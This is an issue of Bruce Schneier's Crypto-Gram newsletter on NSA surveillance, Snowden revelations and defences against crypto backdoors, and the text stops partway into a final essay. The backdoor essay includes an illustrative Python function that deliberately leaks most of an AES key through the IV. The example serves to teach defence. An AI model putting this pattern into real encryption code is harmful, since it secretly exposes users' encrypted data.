Crypto-Gram

November 15, 2013

by Bruce Schneier
BT Security Futurologist
schneier@schneier.com
http://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <http://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <http://www.schneier.com/crypto-gram-1311.html>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:
      NSA Harvesting Contact Lists
      NSA Eavesdropping on Google and Yahoo Networks
      Code Names for NSA Exploit Tools
      Defending Against Crypto Backdoors
      Why the Government Should Help Leakers
      NSA/Snowden News
      The Trajectories of Government and Corporate Surveillance
      A Fraying of the Public/Private Surveillance Partnership
      Book Review: “Cyber War Will Not Take Place”
      Understanding the Threats in Cyberspace
      News
      SecureDrop
      Dry Ice Bombs at LAX
      Schneier News
      The Battle for Power on the Internet


NSA Harvesting Contact Lists

A new Snowden document shows that the NSA is harvesting contact lists—e-mail address books, IM buddy lists, etc.—from Google, Yahoo, Microsoft, Facebook, and others.

Unlike PRISM, this unnamed program collects the data from the Internet. This is similar to how the NSA identifies Tor users. They get direct access to the Internet backbone, either through secret agreements with companies like AT&T, or surreptitiously, by doing things like tapping undersea cables. Once they have the data, they have powerful packet inspectors—code names include TUMULT, TURBULENCE, and TURMOIL—that run a bunch of different identification and copying systems. One of them, code name unknown, searches for these contact lists and copies them. Google, Yahoo, Microsoft, etc., have no idea that this is happening, nor have they consented to their data being harvested in this way.

These contact lists provide the NSA with the same sort of broad surveillance that the Verizon (and others) phone-record “metadata” collection programs provide: information about who are our friends, lovers, confidants, associates. This is incredibly intimate information, all collected without any warrant or due process. Metadata equals surveillance; always remember that.

The quantities are interesting:

During a single day last year, the NSA’s Special Source Operations branch collected 444,743 e-mail address books from Yahoo, 105,068 from Hotmail, 82,857 from Facebook, 33,697 from Gmail and 22,881 from unspecified other providers….

Note that Gmail, which uses SSL by default, provides the NSA with much less data than Yahoo, which doesn’t, despite the fact that Gmail has many more users than Yahoo does. (It’s actually kind of amazing how small that Gmail number is.) This implies that, despite BULLRUN, encryption works. Ubiquitous use of SSL can foil NSA eavesdropping. This is the same lesson we learned from the NSA’s attempts to break Tor: encryption works.

In response to this story, Yahoo has finally decided to enable SSL by default, by January 2014.

The “New York Times” makes this observation:

Spokesmen for the eavesdropping organizations reassured The Post that we shouldn’t bother our heads with all of this. They have “checks and balances built into our tools,” said one intelligence official.

Since the Snowden leaks began, the administration has adopted an interesting definition of that term. It used to be that “checks and balances” referred to one branch of the government checking and balancing the other branches—like the Supreme Court deciding whether laws are constitutional.

Now the N.S.A., the C.I.A. and the White House use the term to refer to a secret organization reviewing the actions it has taken and deciding in secret by itself whether they were legal and constitutional.

One more amusing bit: the NSA has a spam problem.

Spam has proven to be a significant problem for the NSA—clogging databases with information that holds no foreign intelligence value. The majority of all e-mails, one NSA document says, “are SPAM from ‘fake’ addresses and never ‘delivered’ to targets.”

http://www.washingtonpost.com/world/…

PRISM:
http://www.theguardian.com/world/2013/jun/06/…

The NSA and Tor:
https://www.schneier.com/essay-455.html
https://www.schneier.com/essay-454.html

How the NSA gets access:
http://www.washingtonpost.com/business/technology/…
http://www.theguardian.com/business/2013/aug/02/…
http://online.wsj.com/article/…
http://www.guardian.co.uk/uk/2013/jun/21/…
http://www.theatlantic.com/international/archive/…
http://www.theguardian.com/world/2013/jun/06/…

Metadata equals surveillance:
https://www.schneier.com/blog/archives/2013/09/…

BULLRUN:
http://www.theguardian.com/world/2013/sep/05/…
http://www.nytimes.com/2013/09/06/us/…

Yahoo switching to SSL by default:
http://www.theverge.com/2013/10/14/4838878/…
http://www.theregister.co.uk/2013/10/15/…
http://www.washingtonpost.com/s/the-switch/wp/…
https://twitter.com/ashk4n/status/389892774637891584

NSA source documents for the story:
http://apps.washingtonpost.com/g/page/world/…
http://apps.washingtonpost.com/g/page/world/…
http://apps.washingtonpost.com/g/page/world/…

“New York Times” story:
http://takingnote.blogs.nytimes.com/2013/10/15/…


NSA Eavesdropping on Google and Yahoo Networks

The “Washington Post” reported that the NSA is eavesdropping on the Google and Yahoo private networks—the code name for the program is MUSCULAR. I may write more about this later, but I have some initial comments:

* It’s a measure of how far off the rails the NSA has gone that it’s taking its Cold War-era eavesdropping tactics—surreptitiously eavesdropping on foreign networks—and applying them to US corporations. It’s skirting US law by targeting the portion of these corporate networks outside the US. It’s the same sort of legal argument the NSA used to justify collecting address books and buddy lists worldwide.

* Although the “Washington Post” article specifically talks about Google and Yahoo, you have to assume that all the other major—and many of the minor—cloud services are compromised this same way. That means Microsoft, Apple, Facebook, Twitter, MySpace, Badoo, Dropbox, and on and on and on.

* It is well worth re-reading all the government denials about bulk collection and direct access after PRISM was exposed. It seems that it’s impossible to get the truth out of the NSA. Its carefully worded denials always seem to hide what’s really going on.

* In light of this, PRISM is really just insurance: a way for the NSA to get legal cover for information it already has. My guess is that the NSA collects the vast majority of its data surreptitiously, using programs such as these. Then, when it has to share the information with the FBI or other organizations, it gets it again through a more public program like PRISM.

* What this really shows is how robust the surveillance state is, and how hard it will be to craft laws reining in the NSA. All the bills being discussed so far only address portions of the problem: specific programs or specific legal justifications. But the NSA’s surveillance infrastructure is much more robust than that. It has many ways into our data, and all sorts of tricks to get around the law. Note this quote:

John Schindler, a former NSA chief analyst and frequent defender who teaches at the Naval War College, said it is obvious why the agency would prefer to avoid restrictions where it can.

“Look, NSA has platoons of lawyers, and their entire job is figuring out how to stay within the law and maximize collection by exploiting every loophole,” he said. “It’s fair to say the rules are less restrictive under Executive Order 12333 than they are under FISA,” the Foreign Intelligence Surveillance Act.

No surprise, really. But it illustrates how difficult meaningful reform will be. I wrote this in September:

It’s time to start cleaning up this mess. We need a special prosecutor, one not tied to the military, the corporations complicit in these programs, or the current political leadership, whether Democrat or Republican. This prosecutor needs free rein to go through the NSA’s files and discover the full extent of what the agency is doing, as well as enough technical staff who have the capability to understand it. He needs the power to subpoena government officials and take their sworn testimony. He needs the ability to bring criminal indictments where appropriate. And, of course, he needs the requisite security clearance to see it all.

We also need something like South Africa’s Truth and Reconciliation Commission, where both government and corporate employees can come forward and tell their stories about NSA eavesdropping without fear of reprisal.

Without this, crafting reform legislation will be impossible.

* We don’t actually know if the NSA did this surreptitiously, or if it had assistance from another US corporation. Level 3 Communications provides the data links to Google, and its statement was sufficiently non-informative as to be suspicious:

In a statement, Level 3 said: “We comply with the laws in each country where we operate. In general, governments that seek assistance in law enforcement or security investigations prohibit disclosure of the assistance provided.”

On the other hand, Level 3 Communications already cooperates with the NSA, and has the codename of LITTLE:

The document identified for the first time which telecoms companies are working with GCHQ’s “special source” team. It gives top secret codenames for each firm, with BT (“Remedy”), Verizon Business (“Dacron”), and Vodafone Cable (“Gerontic”). The other firms include Global Crossing (“Pinnage”), Level 3 (“Little”), Viatel (“Vitreous”) and Interoute (“Streetcar”).

Again, those code names should properly be in all caps.

When I write that the NSA has destroyed the fabric of trust on the Internet, this is the kind of thing I mean. Google can no longer trust its bandwidth providers not to betray the company.

* The NSA’s denial is pretty lame. It feels as if it’s hardly trying anymore.

* Finally, we need more encryption on the Internet. We have made surveillance too cheap, not just for the NSA but for all nation-state adversaries. We need to make it expensive again.

http://www.washingtonpost.com/world/…
http://apps.washingtonpost.com/g/page/world/…

PRISM:
http://www.washingtonpost.com/investigations/…

My September quote:
https://www.schneier.com/essay-447.html

Level-3 statement:
http://www.nytimes.com/2013/10/31/technology/…

The NSA’s betrayal of the Internet:
https://www.schneier.com/blog/archives/2013/09/…

The NSA’s denial:
http://s.wsj.com/digits/2013/10/30/…
http://www.emptywheel.net/2013/10/30/…

Level-3’s NSA code name:
http://www.theguardian.com/uk/2013/jun/21/…


Code Names for NSA Exploit Tools

This is from a Snowden document released by “Le Monde”:

General Term Descriptions:

HIGHLANDS: Collection from Implants
VAGRANT: Collection of Computer Screens
MAGNETIC: Sensor Collection of Magnetic Emanations
MINERALIZE: Collection from LAN Implant
OCEAN: Optical Collection System for Raster-Based Computer Screens
LIFESAVER: Imaging of the Hard Drive
GENIE: Multi-stage operation: jumping the airgap etc.
BLACKHEART: Collection from an FBI Implant
[…]
DROPMIRE: Passive collection of emanations using antenna
CUSTOMS: Customs opportunities (not LIFESAVER)
DROPMIRE: Laser printer collection, purely proximal access (***NOT*** implanted)
DEWSWEEPER: USB (Universal Serial Bus) hardware host tap that provides COVERT link over USB link into a target network. Operates w/RF relay subsystem to provide wireless Bridge into target network.
RADON: Bi-directional host tap that can inject Ethernet packets onto the same targets. Allows bi-directional exploitation of denied networks using standard on-net tools.

There’s a lot to think about in this list. RADON and DEWSWEEPER seem particularly interesting.

https://www.documentcloud.org/documents/…


Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.
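
One simple way to spot ciphertext is worth sketching (this is my own toy illustration, not the NSA's actual method): well-encrypted data is indistinguishable from uniformly random bytes, so its byte-level entropy is close to the maximum of 8 bits per byte.

    # Toy ciphertext detector (illustration only, not the NSA's method):
    # encrypted data looks like uniformly random bytes, so its Shannon
    # entropy approaches 8 bits per byte.
    import math
    from collections import Counter

    def shannon_entropy(data: bytes) -> float:
        counts = Counter(data)
        n = len(data)
        return -sum(c / n * math.log2(c / n) for c in counts.values())

    def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
        # Compressed data also scores high; a real classifier would use
        # more signals (file headers, protocol context) to tell formats
        # apart and to guess which program produced the ciphertext.
        return shannon_entropy(data) > threshold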

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.
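
To make the mechanism concrete, here is a minimal Python sketch of LEAF-style key escrow. It is an illustration only, not the actual Clipper/Skipjack construction; the library and the variable names are mine.

    # Minimal sketch of LEAF-style key escrow (illustration only; not the
    # real Clipper/Skipjack construction). Requires the "cryptography"
    # package.
    from cryptography.fernet import Fernet

    escrow_key = Fernet.generate_key()   # held by law enforcement
    escrow = Fernet(escrow_key)

    # Each call gets a fresh session key...
    session_key = Fernet.generate_key()
    session = Fernet(session_key)

    # ...and the "LEAF" is that session key, encrypted under the escrow
    # key and transmitted along with the encrypted conversation.
    leaf = escrow.encrypt(session_key)
    ciphertext = session.encrypt(b"the phone conversation")

    # An eavesdropper holding the escrow key recovers the session key
    # from the LEAF, then decrypts the traffic.
    recovered = Fernet(escrow.decrypt(leaf))
    assert recovered.decrypt(ciphertext) == b"the phone conversation"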

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous ACM Turing Award lecture on “trusting trust” that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

* Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector). (A sketch of the IV trick follows this list.)

* High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.

* Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.
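
To make the IV example concrete, here is a minimal Python sketch of such a subverted encryptor. This is my own illustration, not any known backdoor, and a real one would disguise the leak far better, for example by encrypting the leaked bits to the attacker's own key.

    # Sketch of an AES-CTR encryptor subverted to leak key bits through
    # the public IV (illustration only; a real backdoor would obfuscate
    # the leak). Requires the "cryptography" package.
    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def honest_encrypt(key: bytes, plaintext: bytes):
        iv = os.urandom(16)  # truly random IV, sent in the clear
        enc = Cipher(algorithms.AES(key), modes.CTR(iv)).encryptor()
        return iv, enc.update(plaintext) + enc.finalize()

    def subverted_encrypt(key: bytes, plaintext: bytes):
        # The "IV" is 12 key bytes plus 4 random bytes. It still looks
        # random to anyone who doesn't know the trick, but an eavesdropper
        # now only has to brute-force the remaining 4 bytes of a 16-byte
        # key: 2^32 work instead of 2^128.
        iv = key[:12] + os.urandom(4)
        enc = Cipher(algorithms.AES(key), modes.CTR(iv)).encryptor()
        return iv, enc.update(plaintext) + enc.finalize()

The two functions produce interoperable, equally functional output; only someone who knows the trick can tell them apart from the wire.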

These characteristics imply several things:

* A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.

* If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.

* A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.

* Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.

* Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there are more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

* Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.

* The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.

* There should be no master secrets. These are just too vulnerable.

* All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.

* Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information. (A sketch of the counter approach follows this list.)
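
As an illustration of the counter approach, here is a short Python sketch (the framing is my own, not a vetted protocol): both sides derive each nonce from a message counter, so nothing random travels in the clear for a subverted implementation to hide key bits in.

    # Sketch: derive nonces from a predictable counter instead of sending
    # random values that could covertly carry key bits. Uses AES-GCM from
    # the "cryptography" package; the message framing is my own.
    import struct
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    class CounterNonceSender:
        def __init__(self, key: bytes):
            self.aead = AESGCM(key)
            self.counter = 0

        def seal(self, plaintext: bytes) -> bytes:
            # 96-bit nonce = 4 zero bytes + 64-bit message counter. The
            # nonce is predictable, so there is no random field in which
            # to leak secrets; any deviation from the counter is itself
            # evidence of tampering.
            nonce = b"\x00" * 4 + struct.pack(">Q", self.counter)
            self.counter += 1
            return nonce + self.aead.encrypt(nonce, plaintext, None)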

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.
http://www.wired.com/opinion/2013/10/…

The NSA’s secret agreements:
https://www.schneier.com/blog/archives/2013/09/…

Clipper Chip:
http://www.nytimes.com/1994/06/12/magazine/…

How the NSA gets around encryption:
http://www.nytimes.com/2013/09/06/us/…
http://mashable.com/2013/09/11/…
http://news.cnet.com/8301-13578_3-57595202-38/…
http://www.wired.com/threatlevel/2013/10/…
http://www.nytimes.com/2013/10/03/us/…

BULLRUN:
http://www.theguardian.com/world/2013/sep/05/…

Subliminal channels:
https://en.wikipedia.org/wiki/Subliminal_channel

Kleptography:
https://en.wikipedia.org/wiki/Kleptography

Trusting trust:
http://cm.bell-labs.com/who/ken/trust.html

Debian bug:
https://freedom-to-tinker.com//kroll/…

Linux backdoor:
https://freedom-to-tinker.com//felten/…

DUAL_EC_DRBG:
http://www.wired.com/threatlevel/2013/09/…

SSL 2.0 flaw:
http://www.cs.berkeley.edu/~daw/papers/…

GSM A5/1 flaw:
http://www.cs.technion.ac.il/users/wwwb/cgi-bin/…

Common RSA moduli:
http://eprint.iacr.org/2012/064.pdf

_NSAKEY:
http://en.wikipedia.org/wiki/NSAKEY

NSA attacks Tor:
http://www.theguardian.com/world/2013/oct/04/…

Possible Intel RNG backdoor:
https://www.schneier.com/blog/archives/2013/09/…

Nonces:
http://en.wikipedia.org/wiki/Cryptographic_nonce

Assurance:
https://www.schneier.com/blog/archives/2007/08/…

I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the blog comments. Please explain why you think the vulnerability could be intentional. Thank you.


Why the Government Should Help Leakers

In the Information Age, it’s easier than ever to steal and publish data. Corporations and governments have to adjust to their secrets being exposed regularly.

When massive amounts of government documents are leaked, journalists sift through them to determine which pieces of information are newsworthy, and confer with government agencies over what needs to be redacted.

Managing this reality is going to require that governments actively engage with members of the press who receive leaked secrets, helping them secure those secrets—even while being unable to prevent them from publishing. It might seem abhorrent to help those who are seeking to bring your secrets to light, but it’s the best way to ensure that the things that truly need to be secret remain secret, even as everything else becomes public.

The WikiLeaks cables serve as an excellent example of how a government should not deal with massive leaks of classified information.

WikiLeaks has said it asked US authorities for help in determining what should be redacted before publication of documents, although some government officials have challenged that statement. WikiLeaks’ media partners did redact many documents, but eventually all 250,000 unredacted cables were released to the world as a result of a mistake.

The damage was nowhere near as serious as government officials initially claimed, but it was avoidable.

Fast-forward to today, and we have an even bigger trove of classified documents. What Edward Snowden took—”exfiltrated” is the National Security Agency term—dwarfs the State Department cables, and contains considerably more important secrets. But again, the US government is doing nothing to prevent a massive data dump.

The government engages with the press on individual stories. The “Guardian,” the “Washington Post,” and the “New York Times” are all redacting the original Snowden documents based on discussions with the government. This isn’t new. The US press regularly consults with the government before publishing something that might be damaging. In 2006, the “New York Times” consulted with both the NSA and the Bush administration before publishing Mark Klein’s whistleblowing about the NSA’s eavesdropping on AT&T trunk circuits. In all these cases, the goal is to minimize actual harm to US security while ensuring the press can still report stories in the public interest, even if the government doesn’t want it to.

In today’s world of reduced secrecy, whistleblowing as civil disobedience, and massive document exfiltrations, negotiations over individual stories aren’t enough. The government needs to develop a protocol to actively help news organizations expose their secrets safely and responsibly.

Here’s what should have happened as soon as Snowden’s whistleblowing became public. The government should have told the reporters and publications with the classified documents something like this: “OK, you have them. We know that we can’t undo the leak. But please let us help. Let us help you secure the documents as you write your stories, and securely dispose of the documents when you’re done.”

The people who have access to the Snowden documents say they don’t want them to be made public in their raw form or to get in the hands of rival governments. But accidents happen, and reporters are not trained in military secrecy practices.

Copies of some of the Snowden documents are being circulated to journalists and others. With each copy, each person, each day, there’s a greater chance that, once again, someone will make a mistake and some—or all—of the raw documents will appear on the Internet. A formal system of working with whistleblowers could prevent that.

I’m sure the suggestion sounds odious to a government that is actively engaging in a war on whistleblowers, and that views Snowden as a criminal and the reporters writing these stories as “helping the terrorists.” But it makes sense. Harvard law professor Jonathan Zittrain compares this to plea bargaining.

The police regularly negotiate lenient sentences or probation for confessed criminals in order to convict more important criminals. They make deals with all sorts of unsavory people, giving them benefits they don’t deserve, because the result is a greater good.

In the Snowden case, an agreement would safeguard the most important of NSA’s secrets from other nations’ intelligence agencies. It would help ensure that the truly secret information not be exposed. It would protect US interests.

Why would reporters agree to this? Two reasons. One, they actually do want these documents secured while they look for stories to publish. And two, it would be a public demonstration of that desire.

Why wouldn’t the government just collect all the documents under the pretense of securing them and then delete them? For the same reason they don’t renege on plea bargains: No one would trust them next time. And, of course, because smart reporters will probably keep encrypted backups under their own control.

We’re nowhere near the point where this system could be put into practice, but it’s worth thinking about how it could work. The government would need to establish a semi-independent group, called, say, a Leak Management unit, which could act as an intermediary. Since it would be isolated from the agencies that were the source of the leak, its officials would be less vested and—this is important—less angry over the leak. Over time, it would build a reputation and develop protocols that reporters could rely on. Leaks will be more common in the future, but they’ll still be rare. Expecting each agency to develop expertise in this process is unrealistic.

If there were sufficient trust between the press and the government, this could work. And everyone would benefit.

This essay previously appeared on CNN.com.
http://edition.cnn.com/2013/11/04/opinion/…

WikiLeaks story:
http://thelede.blogs.nytimes.com/2011/09/01/…
http://www.salon.com/2011/09/02/wikileaks_28/
http://www.reuters.com/article/2013/07/31/…
http://www.cbsnews.com/2100-201_162-6962209.html
http://www.nytimes.com/2011/01/30/magazine/…

Mark Klein story:
http://www.nytimes.com/2006/04/13/us/…

The world of reduced secrecy:
https://www.schneier.com/essay-449.html

Whistleblowing as civil disobedience:
http://www.zephoria.org/thoughts/archives/2013/07/…

Software to facilitate massive document exfiltrations:
https://www.schneier.com/blog/archives/2013/10/…


NSA/Snowden News

Jack Goldsmith argues that we need the NSA to surveil the Internet not for terrorism reasons, but for cyberespionage and cybercrime reasons.
http://www.newrepublic.com/node/115002/

Daniel Gallington argues—the headline has nothing to do with the content—that the balance between surveillance and privacy is about right.
http://mobile.usnews.com/opinion/s/world-report/…

Good summary from the “London Review of Books” on what the NSA can and cannot do.
http://www.lrb.co.uk/v35/n20/daniel-soar/…

“A Template for Reporting Government Surveillance News Stories.” This is from 2006, but it’s even more true today.
http://www.concurringopinions.com/archives/2006/06/…
We’ve changed administrations—we’ve changed political parties—but nothing has changed.

There’s a story that Edward Snowden successfully socially engineered other NSA employees into giving him their passwords.
http://mobile.reuters.com/article/…

This talk by Dan Geer explains the NSA mindset of “collect everything”:
https://www.schneier.com/blog/archives/2013/11/…
The whole essay is well worth reading.
http://geer.tinho.net/geer.uncc.9x13.txt

This “New York Times” story on the NSA is very good, and contains lots of little tidbits of new information gleaned from the Snowden documents. “The agency’s Dishfire database—nothing happens without a code word at the N.S.A.—stores years of text messages from around the world, just in case. Its Tracfin collection accumulates gigabytes of credit card purchases. The fellow pretending to send a text message at an Internet cafe in Jordan may be using an N.S.A. technique code-named Polarbreeze to tap into nearby computers. The Russian businessman who is socially active on the web might just become food for Snacks, the acronym-mad agency’s Social Network Analysis Collaboration Knowledge Services, which figures out the personnel hierarchies of organizations from texts.”
http://www.nytimes.com/2013/11/03/world/…
This “Guardian” story is related. It looks like both the “New York Times” and the “Guardian” wrote separate stories about the same source material.
http://www.theguardian.com/world/2013/nov/02/…
“New York Times” reporter Scott Shane gave a 20-minute interview on “Democracy Now” on the NSA and his reporting.
http://www.democracynow.org/2013/11/4/…

“Der Spiegel” is reporting that the GCHQ used QUANTUMINSERT to direct users to fake LinkedIn and Slashdot pages run by—this code name is not in the article—FOXACID servers. There’s not a lot technically new in the article, but we do get some information about popularity and jargon.
http://www.spiegel.de/international/world/…
Slashdot has reacted to the story.
https://slashdot.org/topic/bi/…
I wrote about QUANTUMINSERT, and the whole infection process, here.
https://www.schneier.com/essay-455.html


The Trajectories of Government and Corporate Surveillance

Historically, surveillance was difficult and expensive.

Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.

But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there. The former always collected information about everyone, but over time, collected more and more of it, while the latter always collected maximal information, but over time, collected it on more and more people.

Corporate surveillance has been on a path from minimal to maximal information. Corporations always collected information on everyone they could, but in the past they didn’t collect very much of it and only held it as long as necessary. When surveillance information was expensive to collect and store, companies made do with as little as possible.

Telephone companies collected long-distance calling information because they needed it for billing purposes. Credit card companies collected only the information about their customers’ transactions that they needed for billing. Stores hardly ever collected information about their customers, maybe some personal preferences, or name-and-address for advertising purposes. Even Google, back in the beginning, collected far less information about its users than it does today.

As technology improved, corporations were able to collect more. As the cost of data storage became cheaper, they were able to save more data and for a longer time. And as big data analysis tools became more powerful, it became profitable to save more. Today, almost everything is being saved by someone—probably forever.

Examples are everywhere. Internet companies like Google, Facebook, Amazon and Apple collect everything we do online at their sites. Third-party cookies allow those companies, and others, to collect data on us wherever we are on the Internet. Store affinity cards allow merchants to track our purchases. CCTV and aerial surveillance combined with automatic face recognition allow companies to track our movements; so does your cell phone. The Internet will facilitate even more surveillance, by more corporations for more purposes.

On the government side, surveillance has been on a path from individually targeted to broadly collected. When surveillance was manual and expensive, it could only be justified in extreme cases. The warrant process limited police surveillance, and resource restraints and the risk of discovery limited national intelligence surveillance. Specific individuals were targeted for surveillance, and maximal information was collected on them alone.

As technology improved, the government was able to implement ever-broadening surveillance. The National Security Agency could surveil groups—the Soviet government, the Chinese diplomatic corps, etc.—not just individuals. Eventually, they could spy on entire communications trunks.

Now, instead of watching one person, the NSA can monitor “three hops” away from that person—an ever widening network of people not directly connected to the person under surveillance. Using sophisticated tools, the NSA can surveil broad swaths of the Internet and phone network.
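
The arithmetic of hops is worth spelling out. Here is a toy Python sketch (mine, not the NSA's actual contact-chaining code) of what "three hops" means over a contact graph:

    # Toy sketch of "three hops": breadth-first search over a contact
    # graph collects everyone within k hops of a target. With an average
    # of 40 contacts per person, three hops from one target can reach on
    # the order of 40**3 = 64,000 people.
    from collections import deque

    def within_hops(graph: dict, target: str, k: int = 3) -> set:
        seen = {target}
        frontier = deque([(target, 0)])
        while frontier:
            node, dist = frontier.popleft()
            if dist == k:
                continue
            for neighbor in graph.get(node, ()):
                if neighbor not in seen:
                    seen.add(neighbor)
                    frontier.append((neighbor, dist + 1))
        return seen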

Governments have always used their authority to piggyback on corporate surveillance. Why should they go through the trouble of developing their own surveillance programs when they could just ask corporations for the data? For example, we just learned that the NSA collects e-mail, IM, and social networking contact lists for millions of Internet users worldwide.

But as corporations started collecting more information on populations, governments started demanding that data. Through National Security Letters, the FBI can surveil huge groups of people without obtaining a warrant. Through secret agreements, the NSA can monitor the entire Internet and telephone networks.

This is a huge part of the public-private surveillance partnership.

The result of all this is we’re now living in a world where both corporations and governments have us all under pretty much constant surveillance.

Data is a byproduct of the information society. Every interaction we have with a computer creates a transaction record, and we interact with computers hundreds of times a day. Even if we don’t use a computer—buying something in person with cash, say—the merchant uses a computer, and the data flows into the same system. Everything we do leaves a data shadow, and that shadow is constantly under surveillance.

Data is also a byproduct of information society socialization, whether it be e-mail, instant messages or conversations on Facebook. Conversations that used to be ephemeral are now recorded, and we are all leaving digital footprints wherever we go.

Moore’s law has made computing cheaper. All of us have made computing ubiquitous. And because computing produces data, and that data equals surveillance, we have created a world of ubiquitous surveillance.

Now we need to figure out what to do about it. This is more than reining in the NSA or fining a corporation for the occasional data abuse. We need to decide whether our data is a shared societal resource, a part of us that is inherently ours by right, or a private good to be bought and sold.

Writing in the “Guardian,” Chris Huhne said that “information is power, and the necessary corollary is that privacy is freedom.” How this interplay between power and freedom plays out in the information age is still to be determined.

This essay previously appeared on CNN.com.
http://www.cnn.com/2013/10/16/opinion/…

https://www.schneier.com/blog/archives/2013/10/…

Ubiquitous surveillance:
http://www.cnn.com/2013/03/16/opinion/…

Three hop analysis:
http://www.theatlanticwire.com/politics/2013/07/…
http://arstechnica.com/information-technology/2013/…

The public-private surveillance partnership:
https://www.schneier.com/essay-436.html

Chris Huhne’s comment:
http://www.theguardian.com/commentisfree/2013/oct/…

Richard Stallman’s comments on the subject:
http://ieet.org/index.php/IEET/more/stallman20131020


A Fraying of the Public/Private Surveillance Partnership

The public/private surveillance partnership between the NSA and corporate data collectors is starting to fray. The reason is sunlight. The publicity resulting from the Snowden documents has made companies think twice before allowing the NSA access to their users’ and customers’ data.

